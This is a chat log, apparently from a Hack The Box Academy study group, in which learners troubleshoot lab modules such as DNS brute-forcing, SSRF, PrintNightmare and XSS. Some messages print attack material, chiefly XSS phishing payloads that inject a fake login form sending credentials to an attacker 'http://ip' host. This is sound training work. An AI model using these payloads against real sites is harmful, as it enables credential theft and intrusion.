Hello, I'm working through the Attacking Common Services module, specifically Attacking DNS. I'm trying to run subbrute per the hint and no matter what I do, I get a python error. I did update resolvers to ns.inlanefreight.htb. What am I doing wrong? I installed subbrute as listed in the example in the module reading
```
┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ ./subbrute.py -s names_small.txt -r resolvers.txt -p inlanefreight.htb
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
  File "/usr/lib/python3.11/multiprocessing/process.py", line 314, in _bootstrap
    self.run()
  File "/home/stinger/Tools/subbrute/./subbrute.py", line 422, in run
    response = self.check(hostname, query_type, timeout_retries)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/stinger/Tools/subbrute/./subbrute.py", line 342, in check
    resp = self.resolver.query(host)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/stinger/Tools/subbrute/./subbrute.py", line 57, in query
    name_server = self.get_ns()
                  ^^^^^^^^^^^^^
  File "/home/stinger/Tools/subbrute/./subbrute.py", line 107, in get_ns
    ret = self.nameservers[self.pos]
          ~~~~~~~~~~~~~~~~^^^^^^^^^^
IndexError: list index out of range
```
resolver could be the root of the issue
nslookup ns.inlanefreight.htb
to confirm
```
┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ nslookup ns.inlanefreight.htb
Server: 10.211.55.1
Address: 10.211.55.1#53
** server can't find ns.inlanefreight.htb: NXDOMAIN
```
check your resolvers.txt make sure it's correct
What should that look like?
its going to contain your nameserver(s), i don't know off the top of my head
it should just be a list of IP addresses or just one IP
i believe the module goes over how to create it
if it's using a hostname make sure it's in your hosts file
Oh, I was following what the reading did which added the domain name. I did update my etc/hosts just now and added the IP to my etc/hosts and it seems like it may be working now
Thank you! Hopefully that will get me the flag
any quick fix for Targets not spawning?
ctrl + shift + r on the page and try again
I have refreshed page, revisited, etc. numerous times
The resolver wont be that ns.inlanefreight.htb in this case as it is linked to 127.0.0.1. Put the IP given as target in resolver.txt
That helped me
WOah, thanks heaps
that worked
is this a super refresh?
it's a hard refresh, completely ignores cache and re-downloads the whole page fresh from the site
Amazing, learning something new everyday
hell yeah
Thank you! I did that and it seemed to be working, but had an early morning with one of my kids, so I am going to try again tomorrow and let it run longer when I have more energy
Lovely!
Try to exploit the upload form to read the flag found at the root directory "/".
Can sm dm me I need help with sm badly
with what?
I’m trying to learn and I wanted to know if sm could help me get started
what is sm?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
always include the module/section you're in
This is attacking common services - HARD lab
alright try to post your question without spoiling content please
Oh soz
@up
Hello,
It's about the gathering information - web edition. On the aknowledge assessment.
I used ffuf on the third question but i don't got any information
dm me
I am trying to bruteforce a service with hydra and username is known, and the password is in the txt file. However, the issue is, hydra is not cracking the login, provided the username and the file (even tho the pass is in the file)
Stuck on this one (Attacking Common Apps § Assessment Part 1) now myself because ||/m******/****|| is returning a 404 error which is keeping me bogged down trying to use ffuf to figure out what non-standard directory name is being used for the ||T******t|| manager, if any ― any ideas? @cloud urchin?
idk which section you're on
Attacking Common Applications § Assessment Part 1
sorry can't help i didn't make any notes on that
anyone who's has completed attacking common services module? need help
Hi guys, is there a way to reset the exercises in modules?
no
@fathom pendant any ideas?
Your username DEMON#7817
He talked to a four-year-old girl and I’m in a party with the guys talking to him
@everybody
this isn't the place that can help you with that. contact the police.
The cop want help it’s online
@coarse monolith this is not the place
they can subpoena the isp, they are actually the people who can help
Isn’t this a hacker group chat?
no
What the fuck is this then?
Google it and you will find out
this is a study group
It's a study group for penetration testing certifications. Not the place to send a request for someone to hack someone else off platform.
will htb allow us to reset exercises in the future by any chance?
i have no idea i don't work for them, i have never heard of it being planned though. my guess is that it's somehow tied to unlocking the module forever if you complete it, but that's pure speculation. like if you reset your progress you may not 'own' it anymore in the system how it's coded. could be totally wrong.
ahh I see, I would really like for them to allow us to reset the exercises as some of them I did a while back at uni but im coming back to them now after a while, and want to refresh my memory and practice too. It would definitely be helpful if htb thought about doing this, thanks anyways 🙂
you can always just go through the module again and spawn the target without looking at the answers
Was just testing out tmux logging. The log file it created has escape sequences. I followed the steps in the Documentation & Reporting module. Is there a way to get a plaintext output for the logs?
anyone survived MSSQL, Exchange, and SCCM Attacks
Skills Assessment ? Exchange seems slow af
having an issue with my nc shell on unified keep gettin strange symbols.
Pip3 instead
Just use pip3 alone
You gotta make a venv or use --break-system-packages to ignore that and potentially mess something up
do you know how I can make a new venv?
It shows you how in the error
ok thanks, im using chat gpt for now as i started wit that
With pip3
ok thanks hold on
You goober
thank u 😂
or just
You're the reason shampoo bottles have instructions
```
source bin/activate
pip3 install -r requirements.txt
```
no need for roasting my brudda
Too much work
sorry I thought I had already said I installed requirements.txt 😂 what I was facing was another problem, but I managed to solve that now
guys do you know what is the issue here with printnightmare ?
You need accessible payload file.
Make one with msfvenom and put it in accessible SMB share
Maybe try the current directory instead of the file
Still waiting on this one. Attempts to access the vulnerable application's vulnerable interface always return 404 — any idea why?
its works thanks @safe star
Not sure but take another look at the version number @foggy monolith
What can mess up netcat listener? Trying to do Server Side Attacks -> Identifying SSRF module. Not receiving anything trying different things in both ZAP and BURP.
```
POST /index.php HTTP/1.1
Host: 10.199.14.133
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

dateserver=http://10.199.14.133/availability.php&date=2024-01-01
```
As I understand it, it should be my IP there? (tried, but changed for this post).
EDIT: Figured it out, only dateserver should be changed, but I was initially using outgoing ip, not VPN IP.
The only thing that comes up for that version is ||CVE-2019-0232|| which I tried a Metasploit module for already, to no avail.
Trying the examples to see if there's anything there — also nothing.
Hey guys currently in ("Notetaking & Organization - Notetaking & Organization ") and the question is "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) " and so ive tried "Ctrl+B Alt+2" in brackets yet im not sure what im doing wrong any more hints please thank you.
Figured it out. Metasploit was falsely reporting as not vulnerable when it was, so needed to use ForceExploit.
why alt + 2?
Starting off with “I can’t” is definitely the way yeah
Bruhh
I can’t it’s so hard

No one is saying you need to start with kernel exploitation
What is that
Bruh
Hard
Well, with saying "I am not a hacker", you are already following an important principle of not sharing publicly that you are a hacker. Keep it up! If you want confidence booster, try TryHackMe to half a difficulty.
Module: Attacking Web Applications with Ffuf
Section: Skills Assessment - Web Fuzzing
Hints says Use 'PORT' instead of the port shown above, like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc but I don't understand what it means
PORT is a number. A regular website is either 80 (http) or 443 (https) but can also be 8080 or anything else.
Your vulnerable machine likely starts on a specific port. You need to replace the placeholder.
I know but it says that I should not use port shown above and port shown above is 50925 Target(s): 94.237.55.189:50925
So I should use another port?
Use Target's port. I am not sure where it says this, I can't find it in that room.
lol.
hmmmmm
im stuck on "exploitation of pdf generation vulnerabilities". the hint says to look for "alternative common ports for web applications" but i cant find any viable options. anyone that can give me a further hint?
to be precise it says: "enumerate for..."
I believe it was 8000 or 8080
Hey, how's it going? I'm new to this and I'm a bit stuck with the Alert machine lol
I've tried a lot of things, ran manual exploits, used payload dictionaries to test different LFI variations, but nothing seems to be working,
I even tried using the discovered subdomain and concatenating it in the payload, but it still doesn't give me any info. I've been at it for 2 days now, haha.
Yeaaaa
ask in #1309940693002752140
I’m going to do it
go and read #welcome
Curious about this one too. Even went so far as to run find / -iname "flag.txt" 2>/dev/null without the . (thus starting at the root directory and searching through the whole file system) and, still nothing.
i mean you are www-data
should prob find a way to escalate if find doesnt find the flag
check here #modules message
I assume your machine syncs its clock back to normal after you sync it with the dc, so it undoes the syncing.
leme check
guru ji ur great , its working
Working on the module detecting windows attacks with splunk the section detecting unconstrained delegation/constrained delegation attacks. The question "Enter the name of the other computer on which there are traces of reconnaissance related to Unconstrained Delegation as your answer. Answer format: _.corp.local." When I run the splunk query I get back two machines Blue and DC01. Looking at the events for each machine I can't tell why the correct answer was the correct answer. They both seem to be correct. Can anyone share some info on this?
There's definitely ||autodiscover_new.php|| but no way to use that locally using any extant exploits (||46621.py|| requires you to be unauthenticated, unless I'm missing something)
Still not helping here. All the privesc vulnerabilities I'm seeing require horizontal from www-data to nagios first, which is where the problem lies.
Okay, so that's another deceptively worded module. Says it's flag.txt but it's really <random hex digits>_flag.txt — someone in #1234357888114364508 needs to update the module so it says that.
Hi Everyone, i have a connection problem in SOC Role Path Windows Attacks & Defense Module
Can anyone help me?
ssh kali@10.129.152.37 (Target_IP)
ssh: connect to host 10.129.152.37 port 22: Connection refused
i am using a Pwnbox
Anyone else having trouble connecting to the pwnbox?
I was also stuck on this. That is for when u enter the answer use PORT instead of the actual port in ur answer
I’m 🥲
im doing the Injection attacks module and im stuck on "exploit pdf generation vuln". did anyone do this mod?
Hi guy's i need help on the web service&api attacks module
?
okay
i need help on the skill assessment
i do the the good payload but when i start the script i don't have any response
from the server
go through the module once more
preferably up to building soap requests
i haven't done that module
okay men someone else can help me ? 
In active Directory Skills assessment 1 and its asking for something from MS01 but when I ping it it does not seem to be online. anyone else run into this issue?
How I access the photos
Unless it's a DC, Windows machine has ICMP reply turned off by default mostly, so you can't ping them
*Flag*.txt or grep for HTB
Roger. will proceed then and see where it takes me
You could also test with netexec
heard
Ended up finding the result anyway and it didn't even have the string "HTB" in the contents, so recursive grepping would have made no difference.
awesome
I would have needed to use something like grep -rE "^[0-9a-fA-F]{32}$" / 2>/dev/null to find it using the recursive grep suggestion that @safe star made.
this is fine and dandy if you know what you're looking for
otherwise you're just playing in the dark
When trying to pssession into the MS01 its saying it cant find it either. hint towards to correct direction?
DM me?
If you're trying to directly access the 172.16.0.0/16 IP block without first setting up a pivot (using Ligolo-NG or the like) then that's why this is happening.
Yup, kenny is right about that
I wanted you to DM to check if you've set up a pivot to reach MS01
i dm'd that has to be where I am getting caught up. i assumed since I am already in the system i could move on over to another computer.
Thank You
Can someone tell me the exploit im supposed to use in msf to gain access to HOST-2 in Shells and Payloads skill assessment? I looked at the blog and did a searchsploit search for the exploit, but it doesn't show up in msf under the path given.
just use <exploitname>
Thank you, got it working now
Hi guys, im on the phising section of the XSS module and i am struggling with the payload a little bit
here is my payload
when i enter it on the website it says "invalid URL"
I even commented out the html at the end with "<!--"
How to access the photos,
I tried that initially but it still didnt work, checked with chatgpt and it said to add quotes around the ip
document.write('<h3>Please login to continue</h3><form action=http://ip><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--
okay i guess that’s right
both dont seem to work
can you try the same payload used in the module?
looks like an incorrectly composed payload
how can I correct it?
'> opener is a good start
u mean add "script<" ?
‘><s
Can someone help me with the XSS Filter Bypass section of the Advanced XSS and CSRF Exploitation Module? I have found that the || <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> || can get an alert. However when I change the payload to the exploit server link and put my payload I don't seem to be getting anything on the exfiltrate.htb:PORT/log page. The hint says that you shouldn't put a port in the payload and I haven't but I can't seem to get it to work. Can someone help pls?
i tried this
```
>document.write('<h3>Please login to continue</h3><form action=http://ip><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--
```
this is really not what i meant
wrap in '><script></script>
ok thanks ill give it a go
guy, i need some help with a module, the situation is that when i entered my answer for question, it was wrong eventhough i had checked with Reveal Answer and my answer is correct. Can i ask it here ...
you can ask
document.write('<h3>Please login to continue</h3><form action="http://ip"><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
document.getElementById('urlform')?.remove();
</script>
the module i was doing was Intro to Whitebox Pentesting, i was stuck in Eval injection. The answer for my question was {"message":"The input "";//" contains the following invalid characters: [",,;,]"} and i had checked with Reveal Answer, i even tried copy the solution from it but it did not work
why doesnt the payload from htb work on the website
payloads aren’t one size fits all
yea ik that but it should work cos its htb and they usually give the example
also i tried this
'><script>document.write('<h3>Please login to continue</h3><form action=http://ip:80/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
Hi guys, I'm doing the Linux fundamentals course and I'm on the System information pages. I'm trying to ssh to the htb-student user but it's not working on parrot terminal
Is there specific way I need to do this?
What’s not working
does anyone know why this isnt working
I'm trying to type in the password in the terminal but it's not inputting anything
It is inputting, it just doesn’t show
That’s a security measure
If you want you can use sshpass
it probably wants http://google.com
then it probably complains because it doesn't have real internet access so it cant resolve google.com
how can I do that? The module just told us to start a listener which I did
ahh I see
awesome
its not working man 😭 I dont know wth is going on 😭 im getting really burnt out but my ocd wont let me quit
you’re supposed to host a malicious js file on your machine containing the phishing logic
doesn’t the module discuss this?
nah didn't discuss this afaik
i also searched it up on htb
heres a comment
Is anyone else having issues with their servers going down regularly? You submit a form and it tells you that the connection timed out? Happens to me every 30 seconds or so.
yes you’re supposed to do this
when you enter your hosts ip and listening port as an url
do you get a hit?
nada
entered as http://ip:port
yea i did that
Currently having issues with Module #Attacking Common Services Section#DNS. I'd like to confirm that I'm querying the server correctly.
||I'm currently using a fuzzer trying subdomains against inlanefreight.htb using my target IP address that was generated as the resolver. Is this the correct way to do this? I've only received one response being `hr.inlanefreight.htb` which is an empty record||
do you confirm you’re actually listening on that port?
no
yea i am listening on the port
reset target and try again
Please provide more context
im gonna try do it from pwnbox...do u know how i can enable bi directional transfer on it?
its already bloody slow
sorry, yes it’s right, if the question has a specific ns
somewhere in settings
@pine dune
ahh ok ill have a look
No that is the issue i'm experiencing, is that HTB didn't provide context whether I should be using ||ns1|| as a resolver or if I should use the generated IP address.
Using ||ns1|| as the resolver didn't give me any results either
what does the question say?
"Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. "
I assume they mean find all subdomains for inlanefreight.htb. And submit the SOA for one of them that is clearly the flag
wasn’t specific about a ns so there’ll be no need to assume one
What so you think I should use inlanefreight.htb as the resolver?
no the flag will be a dns record
SOA is a dns record its like a comment or certification
pretty sure anyways, i could be wrong
Did you try a zone transfer?
Is anyone else having issues with machines? I cant get a stable connection RDPing into a windows machine. Connection keeps dropping
yea im having issues apparently
I did mess with it a bit but I kinda skipped it, since the hint suggests that I use the github tool subbrute which is a subdomain enumerator and Im not sure how you would fuzz subdomains in a zone transfer.
Thank you for the advice ill try this out
as in querying its own dns server to resolve records? that’s a great question
but the thing is inlanefreight.htb is the domain you’re trying to extract records from
the dns resolver is the one that answers your queries
Apparently is "normal", u have to re connect multiple times
I mean on the subdomains too
Trust me remmina is constantly reconnecting lmao
oh i have not, good point
Hello everyone I lost my account due to 2fa and password forgot can someone pls help me
try switching the vpn server too
no
R u able to
This isn’t hacker for hire
no
We can’t help you. If you lost access to an account, contact the support department of the service
Has anyone else had problems with the exercises in the "File Upload" module? I thought it was something with my computer, but I tried to solve the exercises in AttackBox with the step-by-step solution and I still can't upload the files correctly and Intruder's answers are confusing (it tells me I can upload a file with a certain extension but when I try it doesn't allow me). Is this normal? Or does it just happen to me?
dude pls help me 😭
With what?
XSS phishing
its not working
i tried adding multiple payloads
heres my payload
Send me a dm please, I’ll have a look tomorrow when I get on my pc
ok thank you
the real validation happens on the server
btw, in attacking common module, is gitlab thing of registering an account and viewing public repos really a vuln?
It’s 21:40 and I’m too tired to think 🤣

